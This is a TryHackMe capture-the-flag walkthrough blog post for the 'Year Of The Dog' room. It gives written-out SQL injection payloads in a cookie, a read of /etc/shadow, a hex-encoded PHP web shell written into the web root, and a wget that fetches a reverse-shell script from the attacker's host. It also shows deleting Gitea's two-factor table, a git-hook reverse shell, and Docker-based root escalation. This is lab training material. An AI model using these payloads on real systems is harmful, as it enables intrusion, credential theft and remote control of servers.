Tryhackme Walkthrough : Year Of The Dog

Today we are going to solve a another Tryhackme challenge called “TheYearofthedog” designed by MuirlandOracle . So without wasting too much time let start the war .

Level : Medium

Attacking Strategy

  • Enumeration
    • Rustscan
    • Sqli
  • Exploitation
  • Privilege Escalation

Enumeration

We start our war by scanning the target machine to identify the open service . Here we deploy our weapon called rustscan .

rustscan --ulimit 5001 10.10.138.129 -- -sC -sV -oN nmap 

From result we found port 22 (ssh) , 80 (HTTP) service are running .

Now its time to get more information about the service so we start our Dirb and gobuster but no success so we start manual testing . Therefore we navigate to a web browser for exploring HTTP service.

now here is the twist that every time we refresh the page we get the new queue number , after sometime we make some changes to cookie value and this is responsible for queue number . At this moment we try our sqli injection fuzzing and break the query by putting ‘ at the end of cookie value . If you are new to SQL injection you can try out the tryhackme SQL lab .

Now we know that SQL vulnerability is there and  we are going to start our manual approach.

  • So first find out the columns .
  • Identify the Leak parameter .
  • Then dump out the some information like database name or version .
  • Dump out the tables from database .
  • Dump out the columns
  • At last dump out the content

Now let dumb out the total number of columns we have .

cfd844b81e6048155702a4d80d54a8ec' order by 5 --+

Now we know that there will be less then 5 columns actually we have two columns .

cfd844b81e6048155702a4d80d54a8ec' order by 2 --+
number of columns

After finding out the columns we have to find out the leak parameter which is second columns

cfd844b81e6048155702a4d80d54a8ec' union all select1,2 --+

Now its time to dump out the some information like database name or version ,etc

cfd844b81e6048155702a4d80d54a8ec'  union select 1,database()  --+

Database name is “webapp” , let dump out the tables

cfd844b81e6048155702a4d80d54a8ec'union select 1,group_concat(table_name) from information_schema.tables where table_schema='webapp'  --+

Table we get from the database is “Queue” .

After getting information about the Table its time to dumb out the column information .

cfd844b81e6048155702a4d80d54a8ec'union select 1,group_concat(column_name)from information_schema.columns where table_name='queue' --+

Columns we get are UserId and QueueNum . At this moment we didn’t find any user information like name , password hashes ,etc . After some time we was try to read the file by load_file function and we get success, we can read the system file using the SQL injection vulnerability .

cfd844b81e6048155702a4d80d54a8ec'union all select 1,load_file('/etc/shadow')--+

After reading on internet we figured out that we can also write the file on the server . Here we prepare our payload in the PHP so that we can create some command execution but before that we try to put a simple HTML file so that we can confirm it that this technique is working or not and as show in figure its working fine .

cfd844b81e6048155702a4d80d54a8ec' union all select 1,'hey checking wrtting' into outfile '/var/www/html/test.html' --+

Now let put our payload

cfd844b81e6048155702a4d80d54a8ec' union select 1,'<?php system($_GET['cmd']) ?> into outfile '/var/www/html/rce.php' --+

But it get detected but when we convert the payload string into hex format and then write it bypass this filter.

cfd844b81e6048155702a4d80d54a8ec' union select 1,unhex('3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E') into outfile  '/var/www/html/rce1.php' --+

curl http://10.10.138.129/rce1.php?cmd=id

Our payload get successfully implanted on the server and now we can execute system level commands and with the help of this payload and we get our netcat shell .

Let put the reverse shell on the server by hosting it locally and then call the shell to server and execute it with our payload .

10.10.138.129/rce1.php?cmd=wget http://10.11.3.131:8000/shell1.sh

Shell successfully planted , let execute it using curl or browser .

curl http://10.10.138.129/rce1.php?cmd=bash%20shell1.sh

Privilege Escalation

Here we get our netcat session now it time to move upward to root user ,therefor more enumeration we have to do and we find our the some file is “dylan” user home directory . one is user flag and another is work_analysis file in which we get the password of that user .

cd /home/dylan
ls
cat work_analysis | grep dylan 

we know the user and password , which give us the ssh login directly to the server

ssh [email protected]
password you will get while solving it .

After login we check out the running service , socket connection at internal level we get that there is service running locally and we are going to forward that service to our system by doing local ssh port forwarding .

After doing the port forwarding we start accessing the that service at local address at port 3000 and this some git service and version is 1.13.0 .

Here the twist occur again when we doing login with dylan credentials we get the two-factor authentication and the source code of this application is also located at “/gitea” location and in that source code folder we see that there is database file and we can easily make the modification in that database by using python .

cd /gitea/gitea
python3 
import sqlite3
con = sqlite3.connect('gitea.db')
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
print(cursor.fetchall())
cursor.execute("delete from two_factor")
con.commit()

After commit we refresh the application and we make the login and easily bypass the two_factor authentication and we are in the application which look like the git .

I solve many labs in which git is used so with that experience i simply go to setting and deploy my reverse shell in git-hooks

here we put the simple reverse shell and update the hook and now its time to exploit this service by cloning the repo make some changes and commit and push it .

git clone http://localhost:3000/Dylan/Test-Repo.git
cd Test-Repo
echo "hey new changes pentestsky" >README.md
git add README.md
git commit -m "pentestsky new changes"
git push

and another side we get the session but this session is of an docker container and home directory of the git user is the same file system where our source code is located and we can confirm it by listing the items .

This is the open and shut case , here we first deploy the bash binary with help of docker container with root user and then back to dylan account and run that bash binary which we already make the modification using docker root user.

dylan account
Docker account
root account

Finally we get the root power

Contact : [email protected] or DM us on twitter.

Thankyou

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.